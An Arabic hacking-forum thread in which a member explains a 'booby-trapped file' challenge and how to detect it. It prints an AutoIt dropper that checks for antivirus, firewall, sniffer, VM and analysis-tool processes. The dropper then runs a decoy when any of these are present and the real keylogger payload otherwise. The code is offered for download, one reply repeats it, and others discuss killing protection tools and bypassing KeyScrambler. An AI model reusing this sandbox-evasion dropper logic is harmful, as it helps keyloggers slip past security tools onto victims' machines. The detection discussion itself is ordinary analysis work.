.::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫::. ‏

[al-swisre]

​

السلام عليكم ورحمة الله وبركاته


اليوم راح اشرح لكم انشاء الله طريقة كشف التلغية الثاني والثالثة


من التحديات


طبعا كلنا يعرف ماحصل في التلغيمة الثانية والثالثة


من اخطاء وذلك بسبب عملهن على هوست وهمي


لأن كنت معد التلغيمة على هوستات حقيقية لكن جائت اوامر من فوق


بتغير ذلك فأتمنى تلتمسون لنا العذر الشديد اعتذر لكل واحد واحب على راسه

بطبع كل عمل فيه اخطاء لكن اتمنى تنظرون الى الجانب المشرق

وتتركون الجانب المظلم

فقد استمتعنا بالمواضيع ولمسنا من بعض الاعضاء الحماس والخبرة ومواهب كبيرة

لم اكن اتوقع انها موجود

وليس الهدف هل كشفت التلغيمات اما لا الهدف ماتعلمنا بالمواضيع

مهمة لكل مبتدأ بكشف التلغيم وحتى للخبراء بتطوير انفسهم اكثر

وعدم الاعتماد على الطرق التلقليدية

وبصراحه اكثر استفد انا منكم وتعلمت اكثر





التلغيمة الثالثة

[ حاولت جعل الشرح فيدية لكن لم استطع بسبب اداة الفلود ]

طبعا التلغيمة الثالثة حاولت اجعلها اصعب مرحلة فهي كتالي

هي تعتمد على جزئين اول جزء من لغة autoit

وهو كتالي

$Kaspersky= ProcessExists("avp.exe")
$FortKnoxGUI= ProcessExists("FortKnoxGUI.exe")
$smsniff= ProcessExists("smsniff.exe")
$vmware= ProcessExists("vmware-authd.exe")
$ashmp= ProcessExists("FireWall.exe")
$Sygate= ProcessExists("smc.exe")
$ZoneAlarm= ProcessExists("VSMON.EXE ")
$Wireshark= ProcessExists("Wireshark.EXE ")
$TiGeRFirewall= ProcessExists("TiGeR-Firewall.exe")
$AntiLogger= ProcessExists("AntiLogger.exe")
$taskmgr= ProcessExists("taskmgr.exe")
$ProcessHacker= ProcessExists("ProcessHacker.exe")
$AVira= ProcessExists("avgnt.exe")
$procexp= ProcessExists("procexp.exe")
$regshot= ProcessExists("regshot.exe")

If $Kaspersky + $procexp + $regshot + $FortKnoxGUI + $AVira + $AntiLogger + $smsniff + $vmware + $ashmp + $Sygate + $ZoneAlarm + $Wireshark +
$TiGeRFirewall = "" Then

FileInstall("ocx23.exe","d:\ocx23.exe",1)

run("d:\ocx23.exe")

Else

FileInstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")

EndIf

في اول جزء من السورس تم التعريف بالبرامج واسمائها في البروسيس

بعدها يبدأ الشرط if

اي اذا كانت هذه البرامج موجود في البروسيس

استخرج ملف ocx23 الى d

وقم بتشغيله

طبعا ملف ocx23 وهمي


بعدها تأتي Else

اي اذا لم تكن البرامج في البروسيس

استخرج ocx33 وقم بتشغيله

وهو الحقيقي


-------------------------------------------------------


الان فهمنا الجزء المهم من التلغيمة

نبدأ الان بشرح كشفها وهو سهل جدا ولا يحتاج لتعب

طبعا كشف التلغيمة كاملة لايمكن الاعتماد على برنامج معين

لأنه بمجرد ماتعتمد على برنامج بس اضع اسمه في البروسيس

بكود الايتو ايت ويتم تخطيه لذلك اذا لن اشرح كشف التلغيمة كاملة بل

راح نختصر الى نزول الملفات بـ d

طيب يجي واحد يقول كيف اعرف انه وهمي او لا ؟؟؟

اقولك ياحبيبي لما تشوف ملف حجمه 1.7 يخرج منه ملف حجمه 500

بتأكيد بتعرف انه لازال فيه ملفات بالداخل وهي تعتمد على من يقوم بالفحص

وعلى خبرته

طيب بعد مانزلت الملفات بـ D

نفتح الملف 33

نلاحظ انه يعمل فلود يقوم بأغلاق كل البرامج التي تعمل

بعدها يعمل الكيلوجر بثواني ويغلق نفسه

طيب وش الحل ؟؟؟؟؟

الحل طال عمرك انك تسمي جدار الحماية الخاص بك بأسم msnmsgr.exe

وبل فعل جربوها الاخوان بالموضوع ونجحت

يعني لازم تغيره من مساره الاصلي ويكون عن التشغيل اسمه في البروسيس

مثلا جدار الحماية FortKnox Personal Firewall

وراح تعمل التغيمة ولم يتم عمل فلود لبرنامج FortKnox Personal Firewall

وتكشف البيانات بسهول ويتم استخراج باقي البيانات ان وجد

​

في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة

وهو هدية مني لكم اتمنى تقبلون اعتذاري

لتحميل الكود من هــنـــــأ

وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة


فـــي امـــًًًًًـــــأأأأن الله





​

 

[كود رد]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

احسنت بارك الله فيك

​

 

[باتو هكر]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

يعطيك العافية ياملك

 

[hamza663]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

محجووز
بارك الله اخي على ماقدمته للمنتدى
جاري التطبيق
في انتظار كل جديد منك​

 

[thmaster100]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

إقتباس من : al-swisre

التلغيمة الثالثة

[ حاولت جعل الشرح فيدية لكن لم استطع بسبب اداة الفلود ]

طبعا التلغيمة الثالثة حاولت اجعلها اصعب مرحلة فهي كتالي

هي تعتمد على جزئين اول جزء من لغة autoit

وهو كتالي

$kaspersky= processexists("avp.exe")
$fortknoxgui= processexists("fortknoxgui.exe")
$smsniff= processexists("smsniff.exe")
$vmware= processexists("vmware-authd.exe")
$ashmp= processexists("firewall.exe")
$sygate= processexists("smc.exe")
$zonealarm= processexists("vsmon.exe ")
$wireshark= processexists("wireshark.exe ")
$tigerfirewall= processexists("tiger-firewall.exe")
$antilogger= processexists("antilogger.exe")
$taskmgr= processexists("taskmgr.exe")
$processhacker= processexists("processhacker.exe")
$avira= processexists("avgnt.exe")
$procexp= processexists("procexp.exe")
$regshot= processexists("regshot.exe")








if $kaspersky + $procexp + $regshot + $fortknoxgui + $avira + $antilogger + $smsniff + $vmware + $ashmp + $sygate + $zonealarm + $wireshark +
$tigerfirewall = "" then

fileinstall("ocx23.exe","d:\ocx23.exe",1)

run("d:\ocx23.exe")

else

fileinstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")

endif

​

اكوادي بارك الله فيك

وعد الحر دين عليه

 

[al-swisre]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

هلا وغلا بحبايبي

منورين الله يعطيك العافية يارب

 

[al-swisre]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

إقتباس من : thmaster100

اكوادي بارك الله فيك

وعد الحر دين عليه

[/QUOTE]

في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة

وهو هدية مني لكم اتمنى تقبلون اعتذاري

لتحميل الكود من هــنـــــأ

وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة


فـــي امـــًًًًًـــــأأأأن الله





​

[/QUOTE]


شوف اخر الموضوع ذكرت انها اكوادك لكني قمت بتطويرها فيحق لي طرحها يالغالي

منور

 

[Yousef-mans]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

شكراً علي الموضوع الرائع

تم التقييم يا بطل

 

[عبدالله النامي]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

وآآآآآآآآآآآآآآو

اخيراً نزل الكشف

 

[Prince Iraq]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

بارك الله فيك اخوي السويسري

الشرح واضح و احذر من يستخدمة في الديف

يثبت الموضوع لفترة للفائدة

 

[DESTRUCTOR]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

ومع دلكك لسسآإتني زعلآإن ،​

 

[al-swisre]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

إقتباس من : prince iraq

بارك الله فيك اخوي السويسري

الشرح واضح و احذر من يستخدمة في الديف

يثبت الموضوع لفترة للفائدة

شكرا لك ياقلبي على التثبيت

 

[thmaster100]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة

وهو هدية مني لكم اتمنى تقبلون اعتذاري

لتحميل الكود من هــنـــــأ

وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة


فـــي امـــًًًًًـــــأأأأن الله





​

[/QUOTE]


شوف اخر الموضوع ذكرت انها اكوادك لكني قمت بتطويرها فيحق لي طرحها يالغالي

منور [/QUOTE]


ما عليك , طورتها من قبل وطورت اكثر منها

حتى والبرنامج مشتغل : ) ما تخاف لما كتب احترفت الاوتوايت فهو احترفها كع كع كع

لكن اكوادي < < يا اخي يعشق اكواده


تحيا العقليــــــــــــــDzــــــــة والاكواد الجزائرية

 

[al-swisre]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

إقتباس من : غُـﮧّﮧـﮱـآوٍيَ خٌـ√ـﮧﮧـرٍﺂﮨْـﮯ

ومع دلكك لسسآإتني زعلآإن ،​

امر وش تبي وترضى ياقلبي

 

[az0o0]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

هلا اخوي السويسري مهما تكلمت وتفلسفت فلا يمكن ان اصبح مثلك اخي لانك انسان تفكر بالعقل ماتفكر بالهياط
وهذا الي احبه فيك اخوي السويسري وانت قدوه لاكن عضو موجود في الديف بوينت لاكن حبيت اقولك اني قدرت اتجاوز طريقتك في ازاله برنامج مشفر البيانات الي هو KeyScrambler

انت تطور ونحنا نتحداك

 

[gяαniтт]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

بأٍرك الله فيك ياغألي ,,
شرحـــ رائع ^^

​

 

[الحزن النبيل]

رد

جزاك الله خير اخي العزيز

لكن امر مؤسف وبعد اذنك ان طريقة فاشل للكشف

كل اعتمادك على تغيير اسم اداة كشف إلى عملية ماسنجر للتخطي

طيب مافكرت أضيف عملية ماسنجر لكون AutoIt او اني اضيف كود قتل

عبر فيجوال 6 لأن ماسنجر غير محمي من طرف النظام

اخي احبك بس حبيت اتناقش لو ماعندك مانع

تحياتي تقديري واحترامي
​

 

[ŦỖρֱֻֻ¹]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

فكره حلوه بصراحه

بس كنت متوهق مع نسخة ال x86


​

 

[ŦỖρֱֻֻ¹]

رد: رد

إقتباس من : الحزن النبيل

جزاك الله خير اخي العزيز

لكن امر مؤسف وبعد اذنك ان طريقة فاشل للكشف

كل اعتمادك على تغيير اسم اداة كشف إلى عملية ماسنجر للتخطي

طيب مافكرت أضيف عملية ماسنجر لكون AutoIt او اني اضيف كود قتل

عبر فيجوال 6 لأن ماسنجر غير محمي من طرف النظام

اخي احبك بس حبيت اتناقش لو ماعندك مانع

تحياتي تقديري واحترامي
​

هو قال المسنجر فقط للتوضويح بامكانك وضع اي اسم لملف ال exe الخاص بالحمايه مؤقتا في حال رغبتك في كشف التلغيمه

 

[al-swisre]

رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

إقتباس من : az0o0

هلا اخوي السويسري مهما تكلمت وتفلسفت فلا يمكن ان اصبح مثلك اخي لانك انسان تفكر بالعقل ماتفكر بالهياط
وهذا الي احبه فيك اخوي السويسري وانت قدوه لاكن عضو موجود في الديف بوينت لاكن حبيت اقولك اني قدرت اتجاوز طريقتك في ازاله برنامج مشفر البيانات الي هو keyscrambler

انت تطور ونحنا نتحداك

تسلم ياقلبي على الكلام الجميل وبصراحه انت مشاء الله عليك من الاكتشافات التي صارت بالتحديات

لديك الموهبة والخبرة لتكون خبير فحص

الله يوفقك يارب